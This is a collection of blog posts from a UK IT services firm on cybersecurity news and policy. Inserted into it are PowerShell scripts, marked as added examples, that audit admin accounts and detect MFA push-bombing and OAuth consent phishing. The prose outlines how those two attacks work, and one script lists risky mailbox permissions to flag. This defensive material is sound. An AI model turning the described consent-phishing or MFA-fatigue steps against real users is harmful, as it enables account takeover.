NCSC guidance, right from the top of the organisation, remains the same:

“Even with a war raging in Ukraine, the biggest global cyber threat we still face is ransomware” – Lindy Cameron, NCSC CEO, June 2022.

 

Useful Links:

  • NCSC Early Warning System – Early Warning helps organisations investigate cyber attacks on their network by notifying them of malicious activity that has been detected in information feeds.
  • NCSC Exercise in a Box – A free online tool which helps organisations find out how resilient they are to cyber attacks and practise their response in a safe environment.
  • Incident Management – NCSC guidance on creating your own cyber incident response plan.
  • The UK National Cyber Strategy – setting out five key pillars of the UK's cyber planning.

 

For cyber security and technical expertise, please contact our team today.


2023: New Rules for Cyber Essentials

Each year GCHQ's National Cyber Security Centre issues stricter new rules for businesses and organisations looking to secure UK Cyber Essentials (CE) and Cyber Essentials Plus (CE+) certification.

Continuing themes from last year, there are now tighter rules on account access, thin clients, device firmware, remote desktops, antivirus/EDR solutions and more. Despite the success of the Cyber Essentials scheme, the past year has seen some notable cyber attacks on British organisations, and renewed calls for cyber security vigilance.

We’ve compiled a summary to help organisations prepare for what revisions are coming down the line in April.

 

Multi-Factor or Else.

Even sooner than many expected, Cyber Essentials will now require not only Administrators to have Multi-Factor Authentication enabled – but all end-user accounts as well, across all platforms. Previously exemptions were granted for services without this option available, now that gap closes.

Instead, where a service doesn’t support MFA this will now be declared a non-conformity, bringing digital services fully into line with the rules enforced on UK online banking, and even applying to school children – right down to reception-age.

That’s likely to pose a challenge for companies (and particularly schools) using any software or web services which don’t yet offer MFA – so many organisations may need to look at augmenting their IT setups with 3rd-party MFA solutions like Cisco Duo.

 

Don’t forget the Firmware!

Software version controls now extend to hardware device firmware – with the definition clarified to specifying “firewall and router firmware” in particular – which was always essential, given the perimeter nature of these devices. In a rare step back, firmware on servers, PCs and other devices has been removed from the scope.

 

Device Clarifications

The NCSC has admitted that third-party devices have been a point of confusion, and has published a revised table clarifying which devices fall within the scope of Cyber Essentials. The change applies only to devices that are not domain-joined, or that have limited access to data when unlocked (smartphones, handheld scanners etc.). Where a vendor does not allow a device to be configured to meet CE standards, the applicant may use the vendor defaults without incurring a non-conformity.

Given that the definition partly rests on who owns the device in question, we predict more changes in future years.

CE device rules for 2023

 

Not Just Any Anti-Malware

Antivirus solutions no longer need to be 'signature-based' – since the best EDR solutions don't rely on signature-based detection of threats anyway. CE+ audits will include extra tests to verify that anti-malware software is effective (beyond simple EICAR tests), and application allow-listing is being encouraged.

 

Scoring Changes

Minor and major non-conformities have been merged into a single non-conformity mark. Any applicant receiving three non-conformities fails outright. Corrective actions must now be completed within two days, although some exceptions are available for larger organisations.

However, unsupported operating systems become an unfortunate immediate triple-word score: the presence of any unsupported operating system within the scope is an automatic fail.

 

For Cyber Security and Cyber Essentials expertise, please contact our team today.


The Big 3G Switch Off

By 2025 the UK’s analogue phone network is being switched-off, but that’s not the only major communications technology that is due to be retired imminently.

3G mobile networks are also due to be switched off, with Vodafone leading the charge to retire the older technology. 3G, launched in the UK in 2003, has been replaced in recent years by faster, more reliable 4G and 5G coverage.

According to guidance from Ofcom, the schedules of the UK’s major mobile providers are as follows:

Provider | Timescale                                      | Includes
Vodafone | Begins switching off 3G in 'early 2023'.       | Lebara Mobile, Asda Mobile, Talk Mobile, Virgin Mobile
EE       | Begins switching off 3G in 'early 2024'.       | BT Mobile, Plusnet Mobile, Co-op Mobile, Utility Warehouse
Three    | Begins switching off 3G 'by the end of 2024'.  | Gamma Mobile, ID Mobile
O2       | Yet to announce any switch-off timetable.      | Tesco Mobile, GiffGaff, Sky Mobile, LycaMobile

 

The disappearance of 3G will mostly affect very rural areas and customers with older mobile devices that don't support 4G or 5G. In addition, Ofcom advises businesses to check any other kinds of 3G-enabled devices – such as care alarms, payment terminals and security devices – to ensure these don't stop working. Mobile providers are obliged to announce the change to their customers nearer the time.

Traditional 2G voice and text services are expected to remain in place on Vodafone, EE and O2 until at least the 2030s.

 

For business mobile expertise and support, please contact our team today.


Farewell to Windows 7/8

Extended Support for Windows 7 and Windows 8.1 officially ends as of January 2023.

The older operating systems will no longer receive any security patches or technical updates from Microsoft, which poses a compliance risk to businesses and organisations.

Extended support for Windows 7 originally ended in January 2020, although business customers could purchase an 'Extended Security Update' (ESU) programme for up to three additional years.

Ever since then, Microsoft has regularly urged users to upgrade to Windows 10, and later Windows 11 on PCs with a TPM 2.0 security chip.

Windows 7 was originally released in 2009 and became an overnight success, selling over 100 million copies within six months. As of September 2022, a staggering 11% of traditional PCs are somehow still estimated to be running Windows 7 globally.

Windows 8 suffered a more chequered history: originally developed with a touchscreen-friendly tile display designed to be similar across PCs, tablets and the ill-fated Windows Phone – many users found the new user interface confusing, continuing the mysterious curse of alternate versions of Windows being a flop.

Microsoft Edge 109 will also be the last version of the web browser that will be considered supported for Windows 7 and 8, with a similar change expected from Google within Google Chrome.

Now the World officially waves goodbye to Windows 7/8.1, and any users still stuck on the old versions are faced with the choice of either purchasing a licensing upgrade for their old PC if their hardware permits it, or replacing their device entirely with a newer Windows 10/11-based model.

 

For Operating System expertise and support, please contact our team today.


Police swoop on ‘DDoS-for-Hire’ Operations

UK & Dutch police have helped lead an international operation with Europol to take down one of the World’s biggest DDoS-for-hire services, webstresser.org.

The UK’s National Crime Agency and their Dutch Police counterparts announced the success of ‘Operation Power Off’ – which saw the seizure of infrastructure believed to be linked with criminal activity based in the UK, Netherlands and Germany, and the arrest of individuals as far afield as the UK, Spain, Canada, Croatia, Italy, Australia and Hong Kong by at least a dozen different law enforcement agencies.

On the other side of the Atlantic, the Department of Justice announced an additional six arrests by the FBI, with a further 48 domains seized as part of a criminal investigation into DDoS-for-hire operations.


According to Europol, Webstresser is estimated to have let over 136,000 customers launch more than four million Distributed Denial of Service (DDoS) attacks on targets for as little as £11, overwhelming websites and online services with traffic and knocking them offline. Although DDoS for hire services often pose as genuine ‘stress-test’ tools, users with very little technical knowledge were able to order attacks on unrelated targets – choosing between ‘Bronze’ ‘Silver’ and ‘Platinum’ packages.

The service was thought to be responsible for cyber attacks on at least seven major UK banks in November 2017, as well as numerous other businesses and government departments around the world. The BBC reports UK police have raided an address in Bradford in connection with those attacks on UK banks in particular.

Jaap van Oss, the Dutch Chair of the Joint Cybercrime Action Taskforce (J-CAT), praised the cooperation between law enforcement agencies that finally took Webstresser offline.


Urgent Apple Security Updates

Apple has released urgent security updates for iOS, iPadOS and macOS in response to two new zero-day vulnerabilities.

The company believes both weaknesses are being actively exploited. One is in WebKit, the browser engine that underpins Safari and many other apps; the other is in the operating system kernel.

Through the WebKit flaw, a vulnerable device that processes "maliciously crafted web content" can be made to run attacker-supplied code; the kernel flaw then allows an application to "execute arbitrary code with kernel privileges", essentially full control of the device. Chained together, the two give an attacker everything from a single malicious web page.

Affected software versions include:

  • iOS prior to 15.6.1
  • iPadOS prior to 15.6.1
  • macOS Monterey prior to 12.5.1

Users are advised to check their OS version and update immediately. To do this, please navigate to:

  • On iPhone or iPad: Settings > General > Software Update
  • On Mac: Apple Menu > About this Mac > Software Update

 

For Apple Support and Expertise, please contact our team today.


Macro Misadventure Minimised

Microsoft have altered how macros activate in Microsoft Office files, in an effort to improve users’ cyber security.

Macros, which allow office files to run sequences of commands, can be used to automate simple tasks – but also maliciously by hackers as a mechanism of attack.

Macro-based hacks have been around since the late 1990s, but remain surprisingly effective. Users are commonly asked to open an unexpected email attachment and authorise the macro to see its 'mystery' contents, allowing the macro to introduce malware onto the system. In effect, users authorise the hack themselves.

Instead of the old yellow ‘Security Warning’ labelled with an instant ‘Enable Content’ button users previously saw when using Microsoft Office applications, files will now prompt with a red ‘Learn More’ button, and users will be forced to see guidance on using macros securely, before being able to enable the content.

 

[Image: the new macro security warning bar]

 

This small move – which was originally rolled out, rolled back, and then rolled out again – has been part of a slow clampdown on macros that has lasted more than two decades. Over the years macro functionality has steadily had more restrictions applied – in 2003 IT admins could require macros to have a trusted certificate (more like software applications) and as of 2013, could block macros by default.

But Microsoft hopes this simple firebreak will nudge us to think twice, and stop potentially millions of people from endangering themselves and their technology with a click.

Human nature continues to catch out many users curious about mystery documents – particularly since only a small fraction of Microsoft Office users are even aware of Microsoft 365’s powerful automation features.

 

For IT support and expertise, please contact our team today.


A Policy Change: Admin Rights


This year we’ve made a number of policy changes to how Lineal protects your technology, data and users – part of a programme of adjustments designed to help our clients keep their organisations secure.

One of these is a change to how we manage security permissions. In future, we’ll be stricter about how and when we allow administrator (‘admin’) privileges to be used.

 

What does this mean?

Put simply, we expect no end-user to use an administrator account for their routine work.

Where a user needs administration privileges as part of their official role, we expect a separate admin account to be created for this function, with some extra protections put in place.

All admin accounts should be named to indicate the owner, assigned to only one individual, authorised by management, and protected by Multi-Factor Authentication, where available.
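A way to check an existing Active Directory estate against those rules, as an added example (this is not Lineal's own tooling and not from the original article): it walks the main privileged groups, expands nested membership, and reports each human account with the issues a reviewer would want to see. The `adm-` naming prefix, the use of the Description field to record the owner, and the 90-day dormancy cut-off are assumptions to adjust to your own convention; the ActiveDirectory RSAT module is assumed on the admin host.

```powershell
# Added example (not from the original article): audit privileged group
# membership against the separate-named-admin-account rule. Naming prefix,
# group list and the 90-day dormancy threshold are assumptions.
#Requires -Modules ActiveDirectory
$PrivilegedGroups = 'Domain Admins', 'Enterprise Admins', 'Schema Admins', 'Administrators'
$AdminPrefix      = 'adm-'       # assumed convention: adm-<surname> identifies the owner

function Get-AdminAccountReport {
    param([string[]] $Groups = $PrivilegedGroups, [int] $DormantDays = 90)

    foreach ($group in $Groups) {
        # -Recursive expands nested groups so indirect members are not missed.
        $members = Get-ADGroupMember -Identity $group -Recursive -ErrorAction SilentlyContinue |
                   Where-Object objectClass -eq 'user'

        foreach ($m in $members) {
            $u = Get-ADUser -Identity $m.distinguishedName `
                            -Properties Enabled, LastLogonDate, PasswordLastSet, Description

            $issues = @()
            if ($u.SamAccountName -notlike "$AdminPrefix*") {
                # A day-to-day login name holding admin rights breaks the
                # "separate account for admin duties" rule.
                $issues += 'not a separate named admin account'
            }
            if (-not $u.Enabled) { $issues += 'disabled but still privileged' }
            if ($u.LastLogonDate -and $u.LastLogonDate -lt (Get-Date).AddDays(-$DormantDays)) {
                $issues += "no logon in $DormantDays days"
            }
            if (-not $u.Description) { $issues += 'no owner recorded in Description' }

            [pscustomobject]@{
                Group     = $group
                Account   = $u.SamAccountName
                Enabled   = $u.Enabled
                LastLogon = $u.LastLogonDate
                Issues    = $issues -join '; '
            }
        }
    }
}

# Show only the accounts that need attention.
Get-AdminAccountReport | Where-Object Issues | Sort-Object Group, Account | Format-Table -AutoSize
```

Whether an account is genuinely used by only one person cannot be read out of the directory; that part of the rule is enforced by the owner name in the account itself and by management sign-off, which is why the report flags accounts with no recorded owner.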

 

Why are Lineal taking this step?

Admin accounts carry enhanced powers – often to install applications, access raw data or bypass safeguards – each of which represents a more significant cyber security threat where an admin account is misused or compromised.

In the event of a cyber security breach, it’s not uncommon for attackers to leverage admin accounts to attack other systems or users laterally, using heightened account privileges.

Reducing the number of administrator accounts, their use, and the risk of an account breach, all help to maintain strong cyber security within your organisation.

We’re also acting in line with the current requirements of the UK NCSC’s Cyber Essentials Scheme, as well as ISO 27001, CIS benchmarks and NIST 800-60.

 

Does my organisation need to budget for this?

No – this change will be a guiding principle for the assignment of existing/new admin privileges.

 

My organisation is subject to a compliance standard / framework, what do I do?

If you’re already subject to any specific controls over the distribution of administrator privileges, please contact us to discuss further, and we’ll do our best to explain how these changes support or enhance your existing controls.

 

What if I don’t want to do this, because of _________?

Where a client still allows a user to have local or domain administrative rights for standard duties, we’ll now require you to declare this to us in writing – as part of a disclaimer accepting liability for any adverse consequences of this decision.

We’ll also make clear that any remedial works required by us following an incident caused by this decision will be chargeable.

 

Who can I speak to about this?

Please contact our IT Support Teams via our Client Portal, via [email protected] or, 01271 375999, and one of our team will be happy to assist.


Apple Announces ‘Lockdown Mode’

Apple have unveiled a special ‘Lockdown Mode’ for individuals likely to face extremely targeted threats to their cybersecurity.

Lockdown Mode will be added to iOS 16, iPadOS 16 and macOS Ventura, and is designed for a small number of users who are likely to be targets of high-end surveillance spyware, and require the digital attack 'surface' of their device to be drastically reduced.

The new functionality is partly a response to the work of organisations like NSO Group, who have faced repeated accusations that their counter-terrorism surveillance software has also been used by governments and various state-sponsored actors around the world to illegally target journalists, activists and other political opponents.

The new tool represents an extreme device-hardening posture, and imposes very strict controls – including:

 

  • Messages: Most message attachment types other than images are blocked. Some features, like link previews, are disabled.
  • Web browsing: Certain complex web technologies, like just-in-time (JIT) JavaScript compilation, are disabled unless the user excludes a trusted site from Lockdown Mode.
  • Apple services: Incoming invitations and service requests, including FaceTime calls, are blocked if the user has not previously sent the initiator a call or request.
  • Wired connections with a computer or accessory are blocked when iPhone is locked.
  • Configuration profiles cannot be installed, and the device cannot enroll into mobile device management (MDM), while Lockdown Mode is turned on.

 

Apple is keen to point out that "while the vast majority of users will never be the victims of highly targeted cyberattacks", Lockdown Mode will become an option for those that may be, and reasserts Apple's credentials in the high-end 'secure phone' market previously dominated by BlackBerry and other niche hardware players.

The tech giant will also offer up to $2 million to anybody able to demonstrate a vulnerability in Lockdown Mode under its bug bounty programme – the largest such reward available in the industry.


Emerging Threats

Just occasionally cybercriminals discover a new technique for tricking users or gaining access to something they shouldn’t have.

Hacks and scams go in and out fashion like much else – depending on their effectiveness and particularly, awareness among the wider public.

It’s helpful to keep one step ahead, so here’s our pick of some newer emerging threats to watch out for:

 

MFA Fatigue

Multi-factor 'prompt' notifications on Android and iOS are meant to make life easier. Instead of typing in a six-digit code sent by text or generated by an authentication app, the user simply taps 'Yes, this is me' (or similar) when prompted on their authorising device.

But a hacker who has already obtained a user's password can spam them with such prompts until the user either accepts one by mistake, or deliberately, just to make the prompts stop.

This trick can get the hacker past otherwise robust MFA simply by pestering the targeted user – and users are often spammed in the early hours, when they're likely to approve the attempt without thinking, believing it to be a technical fault. By the time they're asleep again, the hacker is inside their account. Number matching (where the prompt asks the user to type a number shown on the login screen) defeats the blind tap-to-approve, and a burst of declined or unanswered prompts for one account is a signal worth alerting on.
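The detection a security team would run over sign-in logs, as an added example (not from the original article): it groups sign-in records by user and flags anyone who received five or more declined or unanswered MFA prompts within ten minutes, noting whether a successful sign-in followed the burst, which is the attacker getting in. The records below are constructed to resemble a Microsoft Entra sign-in log export; the field names and the error code 500121 for a failed or declined MFA request are assumptions to map onto your own export.

```powershell
# Added example (not from the original article): flag MFA push-bombing in
# sign-in logs. Sample records are constructed to resemble an Entra sign-in
# export; field names and errorCode 500121 (MFA request failed/declined) are
# assumptions. errorCode 0 = successful sign-in.
$sampleJson = @'
[
 {"createdDateTime":"2023-03-01T02:11:05Z","userPrincipalName":"alice@example.com","ipAddress":"203.0.113.7","errorCode":500121,"additionalDetails":"MFA denied; user did not respond to mobile app notification"},
 {"createdDateTime":"2023-03-01T02:12:40Z","userPrincipalName":"alice@example.com","ipAddress":"203.0.113.7","errorCode":500121,"additionalDetails":"MFA denied; user declined the authentication"},
 {"createdDateTime":"2023-03-01T02:13:55Z","userPrincipalName":"alice@example.com","ipAddress":"203.0.113.7","errorCode":500121,"additionalDetails":"MFA denied; user declined the authentication"},
 {"createdDateTime":"2023-03-01T02:15:10Z","userPrincipalName":"alice@example.com","ipAddress":"203.0.113.7","errorCode":500121,"additionalDetails":"MFA denied; user did not respond to mobile app notification"},
 {"createdDateTime":"2023-03-01T02:16:30Z","userPrincipalName":"alice@example.com","ipAddress":"203.0.113.7","errorCode":500121,"additionalDetails":"MFA denied; user declined the authentication"},
 {"createdDateTime":"2023-03-01T02:18:02Z","userPrincipalName":"alice@example.com","ipAddress":"203.0.113.7","errorCode":0,"additionalDetails":"MFA completed in Azure AD"},
 {"createdDateTime":"2023-03-01T09:00:12Z","userPrincipalName":"bob@example.com","ipAddress":"198.51.100.20","errorCode":500121,"additionalDetails":"MFA denied; user did not respond to mobile app notification"},
 {"createdDateTime":"2023-03-01T09:01:30Z","userPrincipalName":"bob@example.com","ipAddress":"198.51.100.20","errorCode":0,"additionalDetails":"MFA completed in Azure AD"}
]
'@

function Find-MfaFatigue {
    param(
        [Parameter(Mandatory)] [object[]] $Records,
        [int] $Threshold     = 5,    # denied/unanswered prompts in the window before alerting
        [int] $WindowMinutes = 10
    )
    $alerts = @()
    foreach ($group in ($Records | Group-Object userPrincipalName)) {
        $events = $group.Group | Sort-Object { [datetime]$_.createdDateTime }
        $denied = @($events | Where-Object { $_.errorCode -eq 500121 })

        # Sliding window: from each denied prompt, count the denied prompts that
        # follow it within the window. One alert per user is enough.
        for ($i = 0; $i -lt $denied.Count; $i++) {
            $start = [datetime]$denied[$i].createdDateTime
            $end   = $start.AddMinutes($WindowMinutes)
            $burst = @($denied | Where-Object {
                $t = [datetime]$_.createdDateTime; $t -ge $start -and $t -le $end })
            if ($burst.Count -lt $Threshold) { continue }

            # A success shortly after the burst means a prompt was approved.
            $approved = $events | Where-Object {
                $t = [datetime]$_.createdDateTime
                $_.errorCode -eq 0 -and $t -gt $start -and $t -le $end.AddMinutes($WindowMinutes)
            } | Select-Object -First 1

            $alerts += [pscustomobject]@{
                User          = $group.Name
                WindowStart   = $start
                DeniedPrompts = $burst.Count
                SourceIPs     = ($burst.ipAddress | Sort-Object -Unique) -join ','
                ApprovedAfter = if ($approved) { [datetime]$approved.createdDateTime } else { $null }
            }
            break
        }
    }
    return $alerts
}

$records = $sampleJson | ConvertFrom-Json
Find-MfaFatigue -Records $records | Format-Table -AutoSize
```

On the constructed sample this reports one alert, for alice, with five denied prompts from a single IP followed by an approval two minutes later; bob's single unanswered prompt and normal sign-in produce nothing. That approved-after-burst case is the one to treat as a confirmed compromise: revoke sessions and reset the password, not just the MFA registration.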

 

30 Pieces of Silver

One of the most interesting revelations from the recent arrest of members of the Lapsus$ extortion group was the wider publicity given to their public-facing Telegram channel.

Among the techniques used by the prolific hacking group were open appeals to recruit disaffected employees of notable companies.

This presents an interesting strategic question: how do you defend against a disgruntled member of your team being bribed to hand over vulnerabilities, credentials or privileged access that would otherwise remain guarded? Attackers who begin inside a network's usual defences have an extra capability for 'lateral' attacks, using each system or login captured to slowly compromise more of the organisation.

An ‘Insider’ attack is perhaps a corporation’s worst nightmare – with even a single VPN or admin password able to cause severe damage.

 

Dodgy App Permissions

A massive ecosystem of additional connected apps is available for Microsoft 365 – although many require additional permissions (such as access to emails, calendars, contacts and more), which are granted through an authorisation standard called OAuth.

Unfortunately this is open to abuse, particularly in ultra-targeted spear phishing of upper-level management and those with privileged accounts. First step: get the user to visit a URL that requests permission for an innocent-sounding app to connect to Microsoft 365. Second step: when the user 'Accepts' the app's access conditions, they grant it access to much of their Microsoft 365 account – access that works remotely through the app's own tokens, is not re-challenged by MFA or the usual protections, and often lasts in perpetuity until someone revokes the consent.

In some cases the permission windows for the suspicious app are specially modified so that cancelling is circular, or give the app immediate permission to email other users the same app authorisation to spread the hack further.
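Triage of user consent grants for exactly this pattern, as an added example (not from the original article): each grant is scored on whether it asks for mailbox or file permissions that work without the user present, whether the publisher is unverified, and whether several users consented to the same app within a short window, which is the self-spreading variant described above. The records are constructed to resemble a flattened export of Entra audit-log "Consent to application" events; the field names and app IDs are assumptions to map onto your own export.

```powershell
# Added example (not from the original article): triage user consent grants
# for illicit-consent (OAuth) phishing. Records are constructed; field names
# and appId values are assumptions to map onto your own audit export.
$sampleJson = @'
[
 {"time":"2023-05-09T08:02:10Z","user":"alice@example.com","app":"Invoice Viewer","appId":"a1b2c3d4-0000-4000-8000-000000000001","publisherVerified":false,"scopes":"Mail.ReadWrite Mail.Send offline_access User.Read"},
 {"time":"2023-05-09T08:06:42Z","user":"bob@example.com","app":"Invoice Viewer","appId":"a1b2c3d4-0000-4000-8000-000000000001","publisherVerified":false,"scopes":"Mail.ReadWrite Mail.Send offline_access User.Read"},
 {"time":"2023-05-09T08:09:15Z","user":"carol@example.com","app":"Invoice Viewer","appId":"a1b2c3d4-0000-4000-8000-000000000001","publisherVerified":false,"scopes":"Mail.ReadWrite Mail.Send offline_access User.Read"},
 {"time":"2023-05-09T11:30:00Z","user":"dave@example.com","app":"Team Calendar Sync","appId":"a1b2c3d4-0000-4000-8000-000000000002","publisherVerified":true,"scopes":"User.Read Calendars.Read"}
]
'@

# Permissions that let an app read, send or persist access to a mailbox or
# files without the user present: the payload of consent phishing.
$RiskyScopes = @('Mail.Read', 'Mail.ReadWrite', 'Mail.Send', 'MailboxSettings.ReadWrite',
                 'Files.Read.All', 'Files.ReadWrite.All', 'Contacts.Read', 'offline_access')

function Get-RiskyConsent {
    param(
        [Parameter(Mandatory)] [object[]] $Grants,
        [int] $SpreadThreshold = 3,    # distinct users consenting to one app ...
        [int] $SpreadMinutes   = 60    # ... within this window looks like worm-style spread
    )
    $byApp = $Grants | Group-Object appId
    foreach ($g in $Grants) {
        $scopes  = $g.scopes -split '\s+'
        $risky   = @($scopes | Where-Object { $RiskyScopes -contains $_ })
        $reasons = @()
        if ($risky.Count -gt 0)        { $reasons += "risky scopes: $($risky -join ' ')" }
        if (-not $g.publisherVerified) { $reasons += 'publisher not verified' }

        # How many distinct users consented to the same app close to this grant?
        $t = [datetime]$g.time
        $peers = @(($byApp | Where-Object Name -eq $g.appId).Group |
                   Where-Object { [math]::Abs(([datetime]$_.time - $t).TotalMinutes) -le $SpreadMinutes } |
                   ForEach-Object user | Sort-Object -Unique)
        if ($peers.Count -ge $SpreadThreshold) {
            $reasons += "$($peers.Count) users consented within $SpreadMinutes min"
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Time    = $t
                User    = $g.user
                App     = $g.app
                Risk    = if ($risky.Count -gt 0 -and -not $g.publisherVerified) { 'High' } else { 'Review' }
                Reasons = $reasons -join '; '
            }
        }
    }
}

$grants = $sampleJson | ConvertFrom-Json
Get-RiskyConsent -Grants $grants | Sort-Object Risk, Time | Format-Table -AutoSize
```

On the constructed sample, the three "Invoice Viewer" grants come out as High (mailbox scopes, unverified publisher, three users in eight minutes) and the verified calendar app is not reported. The preventive control is in the tenant itself: restrict user consent to apps from verified publishers requesting low-impact permissions and route everything else through the admin consent workflow, then revoke any grant this report flags under Enterprise applications in the Entra admin centre.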

 

QR Codes

We’ve written before about the problem with QR codes – and many of the ways they’re potentially open to abuse.

In a mobile-first world, QR codes in public places can all too easily be tampered with to send users to a fraudulent payment page, share malicious links on social media, or even dial premium-rate numbers. Although Google Lens and similar apps will preview a link before the user opens it, the underlying flaw is how easy it is to mimic the style and placement of official, legitimate QR codes, without the end user realising the swap has taken place.

The central problem is user awareness – would you click on a blind link in an email? No, exactly.

 

For cybersecurity expertise and support, please contact our team today.


Introducing Device Management

If your staff’s company-issued devices are now everywhere, how can you keep track – and what are the benefits?

Device Management technology has really come into its own in the last few years, particularly as companies have embraced hybrid working during Covid. 

Maintaining a large digital estate of company devices far beyond the reach of your travel distance or office network sounds like a logistical headache – but it simply requires a shift in approach. Here’s why your organisation should consider rolling out device management:

 

The Basics

First and foremost, device management means protecting access to data and your hardware investment.

Tracking a device's specifications and physical location remotely has long been a cornerstone of device management – but modern hardware-loss protections go a step further by adding the ability for IT admins to remotely lock or even wipe a device in the event of a suspected theft. On the best solutions, MDM software can also look out for suspicious warning signs like a mobile device being jailbroken – and conditionally deny access to company apps or data.

In 2022 that safeguarding can now apply across desktop, mobile and tablet devices – right across Windows, Mac, iOS, Android & ChromeOS. Now that staff work anywhere from their homes to airports, that lockdown ability is a powerful tool.

 

 

Stress-Free Maintenance

With modern device management it’s easier for your IT administrators to manage devices, apps and the updates that apply to them.

In the old days (well, the early 2000s), remote administration meant a device had to be domain-joined, connected via VPN or similar, or within physical travelling distance of the technician.

No longer. Modern device management means device profiles, Windows updates, access to company-approved apps, patches, firewall rules and more can all be created and pushed out centrally 'over the air'. Device management means even the hardware inventory of company devices can be tracked remotely, potentially saving thousands of IT support hours.

 

The ‘Out-of-the-Box’ Experience

Don’t forget the users! Device Management isn’t just to make life easier for the IT admins, but also helps make sure the end-user gets a great experience.

With remote device onboarding, the preparation of new or re-issued devices can be done in advance, allowing the user a complete profile of settings and apps to launch right ‘out of the box’. That flexibility allows organisations to enroll staff that never visit a central hub to collect the device, supporting distributed organisations with personnel (potentially) all over the world.

If your MDM solution also supports single-sign-on, that sign in can be the user’s passport to the full ecosystem of company apps and IT resources, right from day 1.

 

For IT support and systems expertise, please contact our team today.


Apple, Google and Microsoft Agree Passwordless Future

Three major tech providers have agreed to introduce support for passkey-based login, in line with recommendations of the FIDO Alliance.

Passkeys are one proposed route to the death of passwords. A passkey is a public/private key pair created for each website or service: the private key stays on the user's registered device, unlocked by a biometric or PIN, and each login signs a fresh challenge from the service rather than sending a secret. There is therefore nothing reusable for a phishing page or a breached database to steal.

In future Google Chrome, Microsoft Edge and Apple’s Safari will all facilitate passwordless login as an option – and major tech providers will offer passkey login for important online services including Active Directory and Azure.

Microsoft estimate that around 330,000 people have removed their password from their Microsoft Account in the last six months – with most using Microsoft Authenticator as a kind of passkey instead.

‘Hackers don’t break in, they log in’ is an often repeated mantra among cybersecurity professionals – reflecting the fact that most online accounts are breached via a normal login attempt, but with stolen credentials.

The FIDO Alliance is the industry body working to replace password authentication entirely with passkeys – although the organisation admits there are barriers to entry, including organisations' cost to develop their own versions of the technology, an unfamiliar user experience, and the reluctance to 'go first'.

It is hoped that with major tech providers building passkey support into their browsers, many more developers will be able to adopt the new standard to help keep users secure.

 

For Cybersecurity expertise and support, please contact our team today.


Five Free Cybersecurity Gems

A good cybersecurity strategy includes layers of defensive counter-measures, designed to mitigate a wide range of threats at different levels of your organisation.

However there’s lots of ways you can help bolster your cybersecurity a little more, even working on a budget of (basically) zero – here’s our pick of the best:

 

2FA / MFA Directory

We’ve written before about the colossal effectiveness of turning on multi-factor authentication for all your online logins – in particular the way it helps prevent an outside attacker accessing your technology remotely with stolen credentials.

Although compulsory for online banking in the UK, this feature is often available for free elsewhere online as well – and you should take full advantage.

This useful website is an index of websites and online services that already offer 2FA on your account(s), which methods are available, and where to find them.

 

Customised Login Pages

By default, your login window for many public cloud services is identical to everyone else's – for example, by default Microsoft 365 users see a picture of Rio de Janeiro each time they sign in. However, many people don't realise this image can be customised, making the sign-in experience unique to your company.

This feature is often free – but has one really important cybersecurity benefit: it helps your users realise when they might have been redirected to a phishing website. Fake login pages attempting to steal their credentials will often use the default background image to be recognisable to more people, rather than your custom one. When one of your staff clicks the wrong link, the wrong background might just help alert them before they hand over their credentials to a cybercriminal.

 

‘Spot the Phish’ Quiz

Let’s be honest, many online cybersecurity training tools are a bit rubbish – but this little gem of an online game from email security provider Barracuda uses five real examples of scam emails (A & B) to quiz your staff, and educate them on the warning signs.

User training helps build a resilience to cybersecurity threats that isn’t available via technology – protection for the ‘human layer’ of the organisation that needs to be vigilant, no matter which technology they’re using. Challenge your team today!

 

Has your Email been Pwned?

This delightfully terrifying website allows you to search those massive cybersecurity breaches you read about in the news for your own email address – informing you whether your information was involved, and where.

If you find an old email address has been listed in a known data breach, it’s best to update your password, turn on two-factor authentication, and make sure you haven’t used that password anywhere else online – because it’s entirely possible that your credentials are already circulating as part of large stolen data dumps on the dark web.

 

Build a Cyber Action Plan

The UK National Cyber Security Centre (part of GCHQ) offers a free ‘Cyber Action Plan’ tool to sole traders and smaller businesses that takes you through a short questionnaire about your business to help you build a starter list of recommendations to consider.

This is a similar exercise to that undertaken by professional managed cybersecurity providers – but on a smaller scale – well worth a look!

 

For cybersecurity expertise and support, please contact our team today.


Client Portal – What have we learned?

It’s been almost a year since Lineal introduced our new Client Portal, which allows our customers to not only raise new IT Support tickets direct into our systems, but review ticket progress and respond as new information is discovered.

However, we can also use global ticket data to get extra insight into our IT support process, improve our services, and help customers enjoy a better experience. So what have we learned so far?

 

Faster Responses

We’ve noticed some real advantages to customers connecting with us via the client portal – since last year, our average first-response time has improved by approximately 8%.

Evidence also suggests that in-life ticket responses are actually quicker via the portal than when raised by phone (around 5% on average), reflecting the fact that tickets can be updated without both agent and customer being available to continue the conversation at exactly the same moment.

So what does the time saving look like? In practical terms, it takes around 4 minutes longer for a simple phone call to be received, spoken and generated into a new ticket, rather than for that ticket to be submitted directly to the portal by the customer.

If most of those calls became portal tickets, Lineal customers and staff would save as much as 300 hours of talk time each and every year.


 

Changing Times

In previous years we’ve noted that Monday is our busiest day of the week; however, recent data suggests this has shifted to Tuesday – possibly reflecting new hybrid working trends catching on, as office workers choose to reacclimatise to work from home either side of a weekend.

9am-10am remains overwhelmingly our busiest time of the day – as well as the period when a portal ticket can be created with the biggest time saving, compared with calling our Helpdesk.

 

[Graph: client portal faster response times]

 

High Importance

We took a gamble giving customers the ability to grade the priority of support tickets via the portal – we weren’t sure whether this tool would be used the way it was intended.

Statistics suggest it’s been an overwhelmingly positive feature – our highest priority tickets raised via the Client Portal (rated High and Urgent) have significantly faster first response times than not just tickets on average, but corresponding priority tickets raised by other methods.

 

Positive Feedback

Instant feedback (‘smiley face’) buttons added to the bottom of each ticket help users tell us more broadly how we’ve been doing. Ticket feedback for our IT Support service has been overwhelmingly positive (95%) and less than 5% negative.

This is important because the feedback is gathered at time of writing, and on a rolling basis – rather than at times we’ve chosen to measure. Our current target is to increase this to 98% positive or greater.

 

For IT Support help and expertise, please contact our team today.


Lineal Cybersecurity Briefing to UK Exporters

Members of Lineal’s cybersecurity team recently ran a special training event for over a hundred UK exporters, as part of the Department for International Trade’s ‘Export Academy’ initiative.

The UK Export Academy was formed to give UK companies vital know-how as they develop international trade opportunities, and to help them avoid common pitfalls.

Attendees were given a wide-ranging crash course on common threats, including a run-down of various vectors of cyber attack typical to companies trading internationally, and techniques to mitigate dangers.

Topics included best practice for password management & identity protection, email safety, device health, network safeguards and much much more.

We’ll be part of other UK Export Academy events in the near future – you can find more information about the academy here.

Learn more about Lineal Cybersecurity expertise here.


New Security Features in Windows 11

